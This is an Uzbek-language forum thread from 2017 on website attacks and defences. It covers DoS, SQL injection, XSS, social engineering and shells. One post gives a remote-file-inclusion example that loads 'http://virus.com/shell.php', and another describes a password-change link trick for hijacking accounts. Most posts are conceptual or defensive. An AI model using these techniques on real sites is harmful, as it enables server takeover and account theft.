Mavzu: Saytga hujumlar (INTERNET VA DASTURLASH/Sayt yaratishda yordam) BLACK_LION (2 Jun 2017 18:38) Salom bu mavzu saytlarga bo'ladigan hujumlar va agar bilsak ularni bartaraf etish yo'llari haqida muhokama qilamiz.
P/S: bu saytda shuni qilsa bo'ladimi, meni bu saytimni tekshirib bering kabi xabarlar bo'lmasin! BLACK_LION (2 Jun 2017 18:39) DoS (Denial of Service) – xujum qilinayotgan server (nishon) ni faoliyatini vaqtinchalik to’xtatib qo’yish. Bunda xujum qiluvchi nishondagi (target) mavjud xatoliklardan foydalanib unga maxsus noto’gri so’rovlar orqali murojat qilib buffer to’lishini (buffer overflow) ni yuzaga keltiradi. Yana bir usuli nishonga to’xtovsiz juda ko’p so’rovlar jo’natish (flood – so’rovlar bilan bombardimon qilish) orqali ham amalga oshirilishi mumkin. 1-usulda serverdagi script xatosidan foydalanib, unga qing’ir so’rov jo’natib sistemada kritik xatolik (ruxsat etilmagan xotira adresiga murojaat kabilar) yuzaga keltiriladi, server ishdan to’xtaydi. Ushbu usulda serverdagi xatolikni topish talab qilinadi. Misol uchun, serverda foydalanuvchini FIO sini so’rovchi va kiritilgan FIO asosida biror bir amal bajaruvchi dastur (script) ishlayapti deylik. Agar so’ralgan FIO ni o’rniga 100000 belgidan iborat belgilar ketma-ketligi jo’natilsa va dasturda uni uzunligi nazorati ko’zda tutilmagan bo’lsa xatolik yuzaga kelishi mumkin. Bu haqda to’liqroq tushunchaga ega bo’lish Buffer Overflow haqidagi maqolalarni o’qish tavsiya qilinadi. 2-usulda serverning biror ochiq portiga to’xtovsiz so’rovlar jo’natganda server ularni qayta ishlashga ulgurmaydi, ya’ni bir so’rovni qayta ishlayotgan paytda orqasidan yangi so’rov kelsa, yangi so’rov vaqtincha bufferga yozib turiladi. So’rovlar juda ko’p bo’lganda server boshqa klientlardan kelayotgan so’rovlarga javob qaytarolmay qoladi. So’rovlar qancha ko’p bo’lgani sari buffer ham kengayib xotirada katta resursni yeya boshlaydi, natijada serverning ishlashi juda sekinlashadi yoki umaman to’xtab qoladi. Agar serverni quvvati kichik bo’lsa unga kichik vaqt oralig’ida juda ko’p klientlar murojaat qilganda ham DoS yuzaga kelishi mumkin. Odatda xujum qiluvchi xujumni to’xtatishi bilan server yana o’z ishini davom ettirishi mumkin. Har ikkala xolatda ham serverni o’chirib yoqishga (perezagruzka) ham to’g’ri kelishi mumkin. Server (nishon)dan kelayotgan javobni qabul qilish jarayonida xujum qiluvchining o’zi “qotib” qolmasligi uchun xujum qiluvchi IP spoofingdan foydalanadi. DangeR_BoY (2 Jun 2017 18:40) BU XUJIMLARI KELIB CHIQISHI MANIMCHA BIR BIRINI KORALMASLIK BLACK_LION (2 Jun 2017 18:41) --Javob-- DangeR_BoY (2 Jun 2017 18:40): BU XUJIMLARI KELIB CHIQISHI MANIMCHA BIR BIRINI KORALMASLIK ---------- DangeR_BoY, ayrimlarda. Ayrimlarda esa bu raqobat deyiladi. DangeR_BoY (2 Jun 2017 18:44) MANI ESHITISHMCHA TAS-IX SAYTLARGAYAM XUJIM BULGAN DIB ESHITIM SHU ROSTMI BUNGA UZ DOMENDAGI SAYTLAR ULARI XAVSIZLIGI KIMLARNING QULIDA BIROR CHORA KURILADIMI BLACK_LION (2 Jun 2017 18:49) --Javob-- DangeR_BoY (2 Jun 2017 18:44): MANI ESHITISHMCHA TAS-IX SAYTLARGAYAM XUJIM BULGAN DIB ESHITIM SHU ROSTMI BUNGA UZ DOMENDAGI SAYTLAR ULARI XAVSIZLIGI KIMLARNING QULIDA BIROR CHORA KURILADIMI ---------- DangeR_BoY, tas-ix bu tizim. Uning saytlari oddiy sayt, hujumlarni aniqlash bu hosting egalariga bog'liq. Ularga chora ko'riladi albatta, agar aniqlay olishsa! Mr ShaXRuX (2 Jun 2017 21:15) Men qaysidir saytda ko'rdimda ddos dan himoya kodni!
Mana:) + yoki raxmat bilan qo'llab yuborganni ko'zi sog' bo'sin! Aniq ishlashini bilmayman lekin!:)
.
ddos dan himoya kodini
.htassecc ga yozamiz!
.
client_body_timeout 10; Akbarali (2 Jun 2017 21:48) Sayt buzishni yuzlab yo'lari bor ddos va va shunga o'xshash narsalar eng osoni undan ko'ra saytdan xato topib yoki admin logn parolni aniqlab saytga virus tashlab buzgan qulayroq to'g'ri bularni qilgani uzoq vaqt ketadi lekn butunlay tinchidi Tayotabek (2 Jun 2017 21:54) Misol meni saytim sayt.uz meni saytimga ddos bölyapti men uni qaysi saytdan qilyapganini bilsam böladimi.? doniyor (2 Jun 2017 21:55) bir narsani buzishdan oldin usha narsaga uxshash bir narsa yaratib korin keyn birolardi mehnatini qadriga yetas :koz: Akbarali (2 Jun 2017 21:57) Xa aytgancha saytni upload (agar to'g'ri yozgan bo'lsam) qilsa xam buzuladi diydi kim biladi shuni shundan qanday qutulsa bo'ladi. Sardorbek (2 Jun 2017 21:58) --Javob-- Akbarali (2 Jun 2017 21:48): Sayt buzishni yuzlab yo'lari bor ddos va va shunga o'xshash narsalar eng osoni undan ko'ra saytdan xato topib yoki admin logn parolni aniqlab saytga virus tashlab buzgan qulayroq to'g'ri bularni qilgani uzoq vaqt ketadi lekn butunlay tinchidi ---------- Akbarali, Admin paroldi qanday aniqlaysiz? :D Tayotabek (2 Jun 2017 22:00) --Javob-- Akbarali (2 Jun 2017 21:57): Xa aytgancha saytni upload (agar to'g'ri yozgan bo'lsam) qilsa xam buzuladi diydi kim biladi shuni shundan qanday qutulsa bo'ladi. ---------- Akbarali, menimcha upload bu misol john 4x bölsa boshqa versiaga ötkazish misol 6xga menimcha shunaqa.
.
Saytni yana qay yölar bilan buzsa böladi? Panelka shell dirka ddosdan tashqari.. Tayotabek (2 Jun 2017 22:02) --Javob-- Akbarali (2 Jun 2017 21:48): Sayt buzishni yuzlab yo'lari bor ddos va va shunga o'xshash narsalar eng osoni undan ko'ra saytdan xato topib yoki admin logn parolni aniqlab saytga virus tashlab buzgan qulayroq to'g'ri bularni qilgani uzoq vaqt ketadi lekn butunlay tinchidi ---------- Akbarali, menimcha virusdan foyda yöq u kompni telni buzishi mumkin lekin sayt buzmasa kerak.. Nodirali (2 Jun 2017 22:10) Agar shu ddos degan narsani yöqota olganimda darrov yöqotardim. :) Tayotabek (2 Jun 2017 22:11) --Javob-- Nodirali (2 Jun 2017 22:10): Agar shu ddos degan narsani yöqota olganimda darrov yöqotardim. :) ---------- HonDa, yoqotgan taqdirizdaxam boshqa narsalarxam bor. Ddosdan kuchli. Akbarali (2 Jun 2017 22:22) --Javob-- Sardorbek (2 Jun 2017 21:58): Akbarali, Admin paroldi qanday aniqlaysiz? :D ---------- Sardorbek, buni xam ancha usuli bor DangeR_BoY (2 Jun 2017 22:37) DUSHMAN ICHIZDA BULSA DDOSNI XAM KEREGI YU Sardorbek (2 Jun 2017 22:39) --Javob-- Akbarali (2 Jun 2017 22:22): Sardorbek, buni xam ancha usuli bor ---------- Akbarali, qanday? BlackCat (2 Jun 2017 22:46) Mana szga xaqiqiy attacker http://wport.net/fun/hs/ :lol2: :lol: BLACK_LION (2 Jun 2017 22:59) --Javob-- BlackCat (2 Jun 2017 22:46): Mana szga xaqiqiy attacker http://wport.net/fun/hs/ :lol2: :lol: ---------- BlackCat, xD :joy: Akbarali (3 Jun 2017 08:01) --Javob-- Nodirali (2 Jun 2017 22:10): Agar shu ddos degan narsani yöqota olganimda darrov yöqotardim. :) ---------- HonDa, ddosdan xafli narsalar bor Usta (22 Sep 2017 15:38) yuqoridagi link ka kiriib saytga vzlom qilib kirsa mb ketmaydimi? Aniqrog' DreaMs_WorLD (22 Sep 2017 16:08) Saytga hujimlarni
2 xil klasifikatsiyaga bo`lib olish mumkin...

1. Sayt yoki serverga hujim...
2. Sayt adminiga hujim...

Har ikki xolatdayam yomon amaki saytni qo`lga olishi mumkin... masalan ddos qilingan vaqtda back sectordan foydalangan xolatda saytning bosh sahifasiga xoxlagan so`z yoki html ko`d joylashtirish mumkin... yoki sql injection orqali saytdagi xar qande ma`lumotni o`zgartirish bazi hollarda shell kodini yuklab yuborish va uni xatolik bor sahifada ishga tushurish imkoni mavjud... php include (bu usul avvaldan sayt scriptida mavjud bo`lgan kod orqali ishga tushiriladi) wordpressda aynan shu kamchilik bo`lgan kamchilik quyidagicha ko`rinishda bo`lgan: http://wordpress.com/index.php?page=online.php yomon amaki shu xatolikdan foydalanib qanaqadur bir usul bilan page=http://virus.com/shell.php faylini ishga tushirgan va sayt serveridagi barcha fayllar ustidan nazoratni ushlab turgan... keyingi usullardan biri bu xssdir xss qolgan usullarga nisbatan sal kamroq zarar keltiradi lekin bu usul bilan saytdagi xoxlagan foydalanuvchining profiliga kirish shaxsiy xabarlarini o`qish va hokazo ishlarni amalga oshirish mumkin...

2. Sayt adminiga hujim... Bu xolatda ko`proq Ijtimoiy muxandislik (Sotsialnaya Injeneriya) dan foydalaniladi... Natija saytning serveridan tortib sayt admini xaqidagi barcha ma`lumotlarga ega bo`lish mumkin... DreaMs_WorLD (22 Sep 2017 16:13) Xozirgi O`zbek lamerchalari hujim qilishning asosan 1 chi usulidan foydalaniladi... yani sayt yoki serverga hujim qilish... ayrim xollarda ushbu usul samara beradi ayrim xollarda yo`q... Sabab 1 usul xaqida uje ko`pchilikda tushuncha paydo bo`lgan va shu orqali ancha muncha master saytini ximoyalay oladi... lekin 2 usul bo`yicha xali juda ko`p masterlarda aniq va to`liq tushuncha yo`q... Shundan kelib chiqib 2 usul orqali O`zbek masterlarining deyarli barcha saytlarini buzsa bo`ladi degan bo`lardim... DreaMs_WorLD (22 Sep 2017 16:25) 2 chi usul xaqida qisqacha tushuntiraman...
Hozirgi masterlarning ko`pi kompyuter yoki android&ios platformasidagi qurilmalardan foydalanib sayt yaratishadi... Bilamiz Internetda kompyuter qurilmalari uchun troyanskiy viruslar nixoyatda ko`p va bulardan samarali himoyalovchi Antiviruslarimiz ham o`z navbatida mavjud... lekin shu viruslarning alternativ versiyalari aynan mobil qurilmalar uchun ham tayyorlanganini kamchilik biladi... qaysidur bir forumda o`qigan edim... androidlar uchun viruslar yo`q deb... Kechiras shu joyida adashdiz... androidlar uchun ham viruslar yaratilgan va haligacha yaratilib kelmoqda... shu o`rinda erkanni bloklab qo`yadigon programma virus xisoblanmedi (qizlar_nomeri.apk ni nazarda tutdim...) Afsuski mobil qurilmalar uchun ESET Mobiledan boshqa antivirus dasturidan boshqa samarali dastur mavjud emas... (men ko`rgan dasturlar ichidan)... Lekin kamdan kam masterlar bu antivirusdan foydalanishadi... Viruslar va Antiviruslardan foydalanish xaqida gapirdik... Endi aynan Ijtimoiy muxandislik xaqida gapirmoqchiman... Ijtimoiy muxandislik bu ko`z bo`yamachilikdir... yani vzlom qilmoqchi bo`lgan adminni (jertva) aldov yo`li bilan o`z yo`liga yo`naltirish va o`ziga kerakli dastur yoki faylni ishga tushirishdir... natijada troyanskiy viruslar ishga tushadi va jertva xaqidagi barcha malumotlarni jumladan login parollarni ham yomon amakiga jo`natadi... jertva xozirgina saytini buzishganidan behabar internet tarmoqg`ini kavlab o`tiroradi... Mana shu ijtimoiy muxandislik diyiladi... DreaMs_WorLD (22 Sep 2017 16:31) Endi o`zimizni ximoya qilish xaqida to`xtalib o`taman...
Qiziquvchanlik insondagi eng ojiz nuqtadir... Agar kimnidur judayam qattiq odam o`ldirishga qiziqtirsenu lekin oxirida bu ish gunohligini aytsen ham u baribir shu ishni qiladi... chunki inson qiziquvchan bo`ladida...
PS: ximoyaning eng samarali yo`li aynan nimaga qiziqayotganingni faxmlab yetishdir! :zor: UZBakadem (22 Sep 2017 17:02) Saytni shel dirkalardan tozalab tashasa yana shel joylashtirsa buladimi boshqalar qanaqb joylashtiradi malumot aytsalaring kim bilsa KomiLov (22 Sep 2017 20:06) --Javob-- UZBakadem (22 Sep 2017 17:02): Saytni shel dirkalardan tozalab tashasa yana shel joylashtirsa buladimi boshqalar qanaqb joylashtiradi malumot aytsalaring kim bilsa ---------- UZBakadem, shel qoyishni organmaganingiz maqul. U wm olamidagi eng qoloq odamlarni ishi. Buni orgatgan odam ham savobga qolmasligi aniq. UZBakadem (22 Sep 2017 20:10) --Javob-- KomiLov (22 Sep 2017 20:06): UZBakadem, shel qoyishni organmaganingiz maqul. U wm olamidagi eng qoloq odamlarni ishi. Buni orgatgan odam ham savobga qolmasligi aniq. ---------- KomiLov, urgatila demadim qanaqb quyomidgan qiladi demoqchiman DreaMs_WorLD (22 Sep 2017 20:10) --Javob-- UZBakadem (22 Sep 2017 17:02): Saytni shel dirkalardan tozalab tashasa yana shel joylashtirsa buladimi boshqalar qanaqb joylashtiradi malumot aytsalaring kim bilsa ---------- UZBakadem, saytni shell yoki dirkalardan tozalab tashasez keyin kimdur qayta shell yoki dirka joylashtira olmedi PS: agar joylashtirsa demak xali saytizi tozalab ulgurmagan bo`las! :zor: UZBakadem (22 Sep 2017 20:15) --Javob-- DreaMs_WorLD (22 Sep 2017 20:10): UZBakadem, saytni shell yoki dirkalardan tozalab tashasez keyin kimdur qayta shell yoki dirka joylashtira olmedi PS: agar joylashtirsa demak xali saytizi tozalab ulgurmagan bo`las! :zor: ---------- DreaMs_WorLD, Tozalangan SerMenfi tozalaberdi lekin 90% shel tashasa buladi dedida DreaMs_WorLD (22 Sep 2017 20:16) O`ziz mantiqiy o`ylab ko`rin... qanaqasiga tozalangan narsani buzib bo`ladi... buzilsa demak tozalanmagan aniqrog`i to`liq tozalanmagan bo`ladi... NafisGroup (22 Sep 2017 20:18) --Javob-- DreaMs_WorLD (22 Sep 2017 20:16): O`ziz mantiqiy o`ylab ko`rin... qanaqasiga tozalangan narsani buzib bo`ladi... buzilsa demak tozalanmagan aniqrog`i to`liq tozalanmagan bo`ladi... ---------- DreaMs_WorLD, тозалашкина мас соровни филтрлашни мукамалаштириш керак :kozz: DreaMs_WorLD (22 Sep 2017 20:19) tozalash deganda umuman hammasini nazarda tutyabman... filtrdan tordib buglargacha NafisGroup (22 Sep 2017 20:20) Филтр тозаланмиди Толдириладали BLACK_LION (22 Sep 2017 20:21) --Javob-- NafisGroup (22 Sep 2017 20:20): Филтр тозаланмиди Толдириладали ---------- SerMenfi, хссми? DreaMs_WorLD (22 Sep 2017 20:21) obbo degan smail NafisGroup (22 Sep 2017 20:22) Get post zaproslar
NafisGroup (22 Sep 2017 20:23) Getpost zaproslar filtrlash Forumdosh (22 Sep 2017 20:25) Savoldan tushinganim :
Tozalangan scriptga qaytadan dirka yoki shell qo'ysa bo'ladimi? - deb tushindim.
Ashurov (22 Sep 2017 20:28) --Javob-- Sardorbek (2 Jun 2017 21:58): Akbarali, Admin paroldi qanday aniqlaysiz? :D ---------- Sardorbek, ko'p usullari bor masalan siz forumga kiryapsiz sizda o'zingizni ip, brauzer, qurilmangiz bor. xuddi shu qurilmada kesh, cookies degan funksiyalar bor, keshda, brauzer cookiesda barcha xotira saqlanadi (login parolingiz ham) . agar biron bir yomon niyatli do'stimiz biron bir virus yoki boshqa bir dastur yarasa teliyizga yuborsa, bo'ldi uni qo'lida sizning daniylaringiz bu juda oddiy va oson

P/S: Dasturlash tillarni 100% bilgan odam bu ishlar oson hal etadi... DreaMs_WorLD (22 Sep 2017 20:29) Filtrlash - Bu GET hamda POST (cookie Session larni ham) so`rovlarni saralab olish degani... masalan shu yuborish formasi orqali POST so`rovini yuborish mumkin... yani shu xabarni yozgan xolatda... Tasavur qilelik shu post formasi orqali oddiy xabar emas sql yoki java script so`rovini yuborsakchi?? mysql so`rov bu postdagi so`rovni obrabotka qilyatkanda hatoliklar keltirib chiqarishi mumkin shu sababli xabarni htmlspecialchars orqali filtrdan o`tkizib olishimiz mumkin... bu xolatda mysql yoki java umuman oganda dasturlash tiliga oid ko`dlardan xavfli deb tan olinganlari olib tashlanib qolganlari ruslar aytganidek ekraniruyetsa (ekranga chiqarib beriladi)... RARE (23 Sep 2017 10:09) --Javob-- DreaMs_WorLD (22 Sep 2017 20:29): Filtrlash - Bu GET hamda POST (cookie Session larni ham) so`rovlarni saralab olish degani... masalan shu yuborish formasi orqali POST so`rovini yuborish mumkin... yani shu xabarni yozgan xolatda... Tasavur qilelik shu post formasi orqali oddiy xabar emas sql yoki java script so`rovini yuborsakchi?? mysql so`rov bu postdagi so`rovni obrabotka qilyatkanda hatoliklar keltirib chiqarishi mumkin shu sababli xabarni htmlspecialchars orqali filtrdan o`tkizib olishimiz mumkin... bu xolatda mysql yoki java umuman oganda dasturlash tiliga oid ko`dlardan xavfli deb tan olinganlari olib tashlanib qolganlari ruslar aytganidek ekraniruyetsa (ekranga chiqarib beriladi)... ---------- DreaMs_WorLD, misollar bilan yozing ishonchliroq va foydali bo'ladi DreaMs_WorLD (23 Sep 2017 10:11) #44 hm sql injection yoki xssni kodlarini yozib berin demoqchimisiz? RARE (23 Sep 2017 10:28) --Javob-- DreaMs_WorLD (23 Sep 2017 10:11): #44 hm sql injection yoki xssni kodlarini yozib berin demoqchimisiz? ---------- DreaMs_WorLD, yuq qanday himoyalashni nazarda tutgandim masalan deylik avvalo get va post nima ekanligi va qanday farqi borligi haqida keyin ular tomonidan yuboriladigan so'rovlarni saytga ziyoni haqida qolaversa qanday himoyalanish masalan deylik malum bir forma tuzildi va shu forma orqali so'rov jo'natildi.Keyin surov natijasni bazaga yuborishidan oldin uni qayta ishlash va undan keyinga bazaga yuborish haqida.Qolaversa bazadan ma'lumot chiqarish(olish) da ham qayta ishlash (himoyalash) haqida.Ha bular haqida vaqtim bo'lsa o'zim to'liq va tushunarli qilib yozishga harakat qilaman. RoshanShoh (12 Dec 2017 14:30) Ddosni uzini proglari buladi RoshanShoh (12 Dec 2017 14:31) Agar kompda antivirus busa progni virus deydi ushani uchirib keyin ddos qilish kere Ashurov (12 Dec 2017 18:06) --Javob-- RoshanShoh (12 Dec 2017 14:30): Ddosni uzini proglari buladi ---------- RoshanShoh, Kopisi pullik, deyarli hammasi x[DJ_BEST]x (12 Dec 2017 20:09) adminni yashirp qoyish kerak kimligi nomalum qilib Ashurov (12 Dec 2017 20:30) --Javob-- x[DJ_BEST]x (12 Dec 2017 20:09): adminni yashirp qoyish kerak kimligi nomalum qilib ---------- x[DJ_BEST]x, Qanday yashirasiz, hammani moderator qilib, hostingda boshqarasizmi??? x[DJ_BEST]x (12 Dec 2017 20:37) --Javob-- Ashurov (12 Dec 2017 20:30): x[DJ_BEST]x, Qanday yashirasiz, hammani moderator qilib, hostingda boshqarasizmi??? ---------- Fruden, yoq mansabi bilinmasn nik yonida ikonka yoki boshqa joyda Ashurov (12 Dec 2017 20:38) --Javob-- x[DJ_BEST]x (12 Dec 2017 20:37): Fruden, yoq mansabi bilinmasn nik yonida ikonka yoki boshqa joyda ---------- x[DJ_BEST]x, ha unda foydsiz ekan bu usul ScarPion (12 Dec 2017 23:01) --Javob-- x[DJ_BEST]x (12 Dec 2017 20:09): adminni yashirp qoyish kerak kimligi nomalum qilib ---------- x[DJ_BEST]x, maza qilib kuldim lekin x[DJ_BEST]x (13 Dec 2017 06:44) --Javob-- ScarPion (12 Dec 2017 23:01): x[DJ_BEST]x, maza qilib kuldim lekin ---------- ScarPion, kulguli joyiyoq himoyani bir usulidabiu RoshanShoh (13 Dec 2017 07:15) --Javob-- Ashurov (12 Dec 2017 18:06): RoshanShoh, Kopisi pullik, deyarli hammasi ---------- Fruden, tushunmadim qanaqa kopiy ScarPion (13 Dec 2017 07:36) --Javob-- x[DJ_BEST]x (13 Dec 2017 06:44): ScarPion, kulguli joyiyoq himoyani bir usulidabiu ---------- x[DJ_BEST]x, adminkani vzlom qilish uchun admin akkautini vzlom qilish shart emas KAROL (13 Dec 2017 08:10) Adminkani buzosh bu oson ish emas!
Admin parolini topsagina kiroladi kirgan taqdirda ham bazadan tiklasa bo'ladi!
Baza va scriptni himoyalash kerak, ko`pincha baza malumoti yozilgan db.php orqali kirishadi. Ashurov (13 Dec 2017 09:18) --Javob-- RoshanShoh (13 Dec 2017 07:15): Fruden, tushunmadim qanaqa kopiy ---------- RoshanShoh, Ddos dasturlar pullik x[DJ_BEST]x (13 Dec 2017 12:10) --Javob-- ScarPion (13 Dec 2017 07:36): x[DJ_BEST]x, adminkani vzlom qilish uchun admin akkautini vzlom qilish shart emas ---------- ScarPion, admin parolsz adminkaga kirmaydku ScarPion (13 Dec 2017 17:22) --Javob-- x[DJ_BEST]x (13 Dec 2017 12:10): ScarPion, admin parolsz adminkaga kirmaydku ---------- x[DJ_BEST]x, admin profilini vzlom qilish shart emas hakker janobi oliylari o'zlarini akkautlariga dostup bervoladila. keyin saytni buzishni istasala adminkani emas bazani uxlatishadi va DROP `tables` komandasini beradi tamom saytda na admin na boshqa qoladi ScarPion (13 Dec 2017 17:25) ximoyalanish 2 xil boladi tizim ximoya va tarmoq ximoya eng yaxshisi o'zgaruvchilarni filtrlash misol uchun saytni chatini olaylik agar birorta o'zgaruvchi kerakli filtr bilan yopilmagan bo'sa yomon bolalar usha yerga MYSQL oynasini yaratib o'zlariga bemalol mansab sovg'a qiladila bu eng oddiy usuli admin_uz (14 Dec 2017 01:54) --Javob-- ScarPion (13 Dec 2017 17:25): ximoyalanish 2 xil boladi tizim ximoya va tarmoq ximoya eng yaxshisi o'zgaruvchilarni filtrlash misol uchun saytni chatini olaylik agar birorta o'zgaruvchi kerakli filtr bilan yopilmagan bo'sa yomon bolalar usha yerga MYSQL oynasini yaratib o'zlariga bemalol mansab sovg'a qiladila bu eng oddiy usuli ---------- ScarPion, birorta o`zgaruvchiga filtr qo`yib na`muna ko`rsating admin_uz (14 Dec 2017 01:59) scriptni ichida GET borligini qanday osonroq aniqlasa bo`ladi xar bir phpni 1 talab tekshirmasdan qandaydur qidirish tizimi bormi?


P.S agar mavzuda odashgan bo`lsam off uchun uzur dimauz (14 Dec 2017 03:41) Shu dirka va shelni qanday tozalasa boladi.
U biror .php faylda boladimi yo
kod ichidagi kodlarmi LIDER_MASTER (14 Dec 2017 08:41) SAYTGA XUJUM QILUVCHI PROGRAMMALA BOMI ScarPion (14 Dec 2017 09:28) --Javob-- admin_uz (14 Dec 2017 01:59): scriptni ichida GET borligini qanday osonroq aniqlasa bo`ladi xar bir phpni 1 talab tekshirmasdan qandaydur qidirish tizimi bormi?


P.S agar mavzuda odashgan bo`lsam off uchun uzur ---------- admin_uz, hammasida boladiyu KAROL (14 Dec 2017 10:26) --Javob-- dimauz (14 Dec 2017 03:41): Shu dirka va shelni qanday tozalasa boladi.
U biror .php faylda boladimi yo
kod ichidagi kodlarmi ---------- dimauz, u .php fayl bo'ladi! O'zini hackerman deb qo'liga tushgan script ichiga joylab sotadi yoki tarqatadi farqlash oson fayl sodda va tushunarli erinmasdan ortiqcha fayllarni tekshiras. Ashurov (14 Dec 2017 10:55) --Javob-- LIDER_MASTER (14 Dec 2017 08:41): SAYTGA XUJUM QILUVCHI PROGRAMMALA BOMI ---------- LIDER_MASTER, BoR ScarPion (14 Dec 2017 11:59) --Javob-- dimauz (14 Dec 2017 03:41): Shu dirka va shelni qanday tozalasa boladi.
U biror .php faylda boladimi yo
kod ichidagi kodlarmi ---------- dimauz, php ni shunmasez topomis kodlardagi xatolik xatolik deyish ham xato kamchilik desa ham boladi foxmexa (14 Dec 2017 12:13) qamday yular bilan hastni ichiga kirsa buladi yani akont ScarPion (14 Dec 2017 16:33) $ga extiyot bo'lish kere Ashurov (14 Dec 2017 22:27) --Javob-- foxmexa (14 Dec 2017 12:13): qamday yular bilan hastni ichiga kirsa buladi yani akont ---------- foxmexa, Juda kop unaqa yollar Forumdosh (14 Dec 2017 22:29) --Javob-- Ashurov (14 Dec 2017 22:27): foxmexa, Juda kop unaqa yollar ---------- Fruden, masalan?
Birovni aldab login-parolini olish deng :D

P/s : Gapim sizga tegishli emas. :) Ashurov (14 Dec 2017 22:34) --Javob-- Forumdosh (14 Dec 2017 22:29): Fruden, masalan?
Birovni aldab login-parolini olish deng :D

P/s : Gapim sizga tegishli emas. :) ---------- Forumdosh, Aldash shart emas, masalan siz parolni ozgartiradigan sahifa http://saytnomi/editpassword.php bo'la qolsin. menga sizni parolingiz kerak sizga link tashlayman, siz unga kirasiz sizda parol ozgartirildi deydi, shu moment akkauntiyiz menda :)
P/S: 1Mlnga ham sotmas edim, bu gap sizni akkauntiyiz haqida emas Forumdosh (14 Dec 2017 22:37) --Javob-- Ashurov (14 Dec 2017 22:34): Forumdosh, Aldash shart emas, masalan siz parolni ozgartiradigan sahifa http://saytnomi/editpassword.php bo'la qolsin. menga sizni parolingiz kerak sizga link tashlayman, siz unga kirasiz sizda parol ozgartirildi deydi, shu moment akkauntiyiz menda :)
P/S: 1Mlnga ham sotmas edim, bu gap sizni akkauntiyiz haqida emas ---------- Fruden, hullas NafisGroup(Sermenfi) style deng :D
Men hostingdagi akkauntni nazarda tutgan edim. :) NafisGroup (14 Dec 2017 22:38) --Javob-- Forumdosh (14 Dec 2017 22:37): Fruden, hullas NafisGroup(Sermenfi) style deng :D
Men hostingdagi akkauntni nazarda tutgan edim. :) ---------- Forumdosh, men togrimda nima deysan Ashurov (14 Dec 2017 22:42) --Javob-- Forumdosh (14 Dec 2017 22:37): Fruden, hullas NafisGroup(Sermenfi) style deng :D
Men hostingdagi akkauntni nazarda tutgan edim. :) ---------- Forumdosh, Bu usul hamma joyda ishlaydi, bekor uni esladingiz... ScarPion (14 Dec 2017 22:42) --Javob-- Ashurov (14 Dec 2017 22:34): Forumdosh, Aldash shart emas, masalan siz parolni ozgartiradigan sahifa http://saytnomi/editpassword.php bo'la qolsin. menga sizni parolingiz kerak sizga link tashlayman, siz unga kirasiz sizda parol ozgartirildi deydi, shu moment akkauntiyiz menda :)
P/S: 1Mlnga ham sotmas edim, bu gap sizni akkauntiyiz haqida emas ---------- Fruden, :voy: :voy: :voy: :voy: Forumdosh (14 Dec 2017 22:43) --Javob-- NafisGroup (14 Dec 2017 22:38): Forumdosh, men togrimda nima deysan ---------- NafisGroup, anavi bo'lmag'ur ssilkalaring haqida gap ketyabdi shekilli. :D Ashurov (14 Dec 2017 22:43) --Javob-- Forumdosh (14 Dec 2017 22:37): Fruden, hullas NafisGroup(Sermenfi) style deng :D
Men hostingdagi akkauntni nazarda tutgan edim. :) ---------- Forumdosh, Hostingda ham parol almashtirish joyi borku?? ScarPion (14 Dec 2017 22:44) --Javob-- Ashurov (14 Dec 2017 22:43): Forumdosh, Hostingda ham parol almashtirish joyi borku?? ---------- Fruden, :joy: :joy: :joy: :joy: :joy: :joy: Forumdosh (14 Dec 2017 22:44) --Javob-- Ashurov (14 Dec 2017 22:42): Forumdosh, Bu usul hamma joyda ishlaydi, bekor uni esladingiz... ---------- Fruden, ha,bilaman,qora niyatlilar ishlatadi.
Eslasam nima qilar ekan? :D Forumdosh (14 Dec 2017 22:44) --Javob-- Ashurov (14 Dec 2017 22:43): Forumdosh, Hostingda ham parol almashtirish joyi borku?? ---------- Fruden, yo'q demadim shekilli? :D
Ashurov (14 Dec 2017 22:44) --Javob-- ScarPion (14 Dec 2017 22:42): Fruden, :voy: :voy: :voy: :voy: ---------- ScarPion, Tinchlimi?? nega kulyapsiz, men ham kulay :} NafisGroup (14 Dec 2017 22:45) --Javob-- Forumdosh (14 Dec 2017 22:43): NafisGroup, anavi bo'lmag'ur ssilkalaring haqida gap ketyabdi shekilli. :D ---------- Forumdosh, bolmagurmas boldiradiganku :kozz: ScarPion (14 Dec 2017 22:45) --Javob-- Ashurov (14 Dec 2017 22:44): ScarPion, Tinchlimi?? nega kulyapsiz, men ham kulay :} ---------- Fruden, postlarizga kulvomman Ashurov (14 Dec 2017 22:47) --Javob-- NafisGroup (14 Dec 2017 22:45): Forumdosh, bolmagurmas boldiradiganku :kozz: ---------- NafisGroup, To'g'ri bunaqa linklar aniq ishlaydi, forumda magazin xatosi ham shundan kelib chiqdi uzmlar kopayishi, magazindagi tovarlarni bepul olish kabilar Ashurov (14 Dec 2017 22:48) --Javob-- Forumdosh (14 Dec 2017 22:44): Fruden, yo'q demadim shekilli? :D
---------- Forumdosh, Shu kunlarda gumon, shekillilar ko'payib ketdi :D Forumdosh (14 Dec 2017 22:48) --Javob-- NafisGroup (14 Dec 2017 22:45): Forumdosh, bolmagurmas boldiradiganku :kozz: ---------- NafisGroup, hacker bo'lsang o'zingga,kimdir aytgan edi,hackerlikni o'rgangandan keyin qaysi yo'lni tanlash odamning o'ziga bog'liq deb.Oq-qora. Ashurov (14 Dec 2017 22:50) --Javob-- Forumdosh (14 Dec 2017 22:44): Fruden, ha,bilaman,qora niyatlilar ishlatadi.
Eslasam nima qilar ekan? :D ---------- Forumdosh, Sizga ham birta link bervoraymi ha mayli mana [url=http://uzmasters.ru]http://fruden.ml[/url] kiring NafisGroup (14 Dec 2017 22:51) --Javob-- Forumdosh (14 Dec 2017 22:48): NafisGroup, hacker bo'lsang o'zingga,kimdir aytgan edi,hackerlikni o'rgangandan keyin qaysi yo'lni tanlash odamning o'ziga bog'liq deb.Oq-qora. ---------- Forumdosh, men ummuman hakerman demadim shekili hech qachon. Shu hakerman degan sozmni top 500wmr beraman Forumdosh (14 Dec 2017 22:51) --Javob-- Ashurov (14 Dec 2017 22:48): Forumdosh, Shu kunlarda gumon, shekillilar ko'payib ketdi :D ---------- Fruden, off uchun uzr.
Siz ishonch bildirgan Cracker_Boy midi? :D
Spammer Group :D
Chatga qarang :D
